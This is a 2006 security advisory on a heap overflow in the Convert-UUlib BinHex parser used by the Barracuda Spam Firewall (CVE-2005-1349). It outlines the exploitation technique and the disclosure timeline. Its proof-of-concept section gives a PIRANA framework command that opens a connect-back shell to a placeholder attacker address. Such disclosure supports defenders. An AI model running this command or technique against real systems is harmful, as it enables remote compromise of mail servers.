Topic:                  Barracuda Convert-UUlib library buffer
                        overflow leads to remote compromise

Announced:              2006-12-05
Product:                Barracuda Spam Firewall
Vendor:                 http://www.barracudanetworks.com/
Impact:                 Remote shell access
Affected product:       Barracuda Spam Firewall with firmware <
                        3.3.15.026 AND virus definition < 2.0.325
Credits:                Jean-Sébastien Guay-Leroux
CVE ID:                 CVE-2005-1349


I.      BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software
solution for complete protection of your email server. It provides a
powerful, easy to use, and affordable solution to eliminating spam and
virus from your organization by providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


II.     DESCRIPTION

In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert-
UUlib library.  Few details were published regarding this flaw.

After some research, I found that the flaw was in the part of the code
where BinHex files were getting parsed.  By supplying an invalid size
for the resource fork or data fork in a BinHex's file header, it is
possible to create a heap overflow.

By taking advantage of the sequentials calls to free(), it's possible
to overwrite more than 4 bytes.  In fact, we can write a jmpcode in
memory that will jump to one of our registers containing the location
of our shellcode.  By using this technique, the exploit will be much
more reliable.  You will only need to supply a return location address
to the exploit code.

You do NOT need to have remote administration access (on port 8000)
for successfull exploitation.

For further informations about the details of the bugs, check the
exploit code.


III.    IMPACT

Gain shell access to the remote Barracuda Spam Firewall.


IV.     PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com ,
it is possible to test the Barracuda Spam Firewall against the
Convert-UUlib vulnerability.

The version 0.3.1 of the PIRANA framework incorporates a new module to
exploit the Convert-UUlib library bug.  It contains three hardcoded
offsets that should reliably exploit every Barracuda Spam Firewall
with a firmware below 3.3.15.026 and virus definition below 2.0.325.

By calling PIRANA the way it is described below, you will get a TCP
connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \
-l 1.2.3.4 -p 1234


V.      VERSIONS AFFECTED

This affects firmware releases before versions 3.3.15.026.  This is no
longer an issue with Barracuda's customers with current Energize
Updates, running virus definition 2.0.325, released Nov. 29, 2006.  It
is recommended that Barracuda's customers upgrade to the latest
generally available release.


VI.     CREDITS

Mark Martinec and Robert Lewis found the original flaw in Convert-
UUlib.

Jean-Sébastien Guay-Leroux conducted further research on the bug and
produced an exploitation plugin for the PIRANA framework.


VII.    REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349


VIII.   HISTORY

2005-04-26  : Bug is disclosed by Mark Martinec and Robert Lewis.
2006-08-??  : Convert-UUlib module exploit written for PIRANA.
2006-11-28  : Barracuda Networks is notified about the problem.
2006-11-28  : Barracuda Networks acknowledged the problem.
2006-11-29  : Barracuda Networks published a fix.
2006-12-05  : Advisory is disclosed to the public.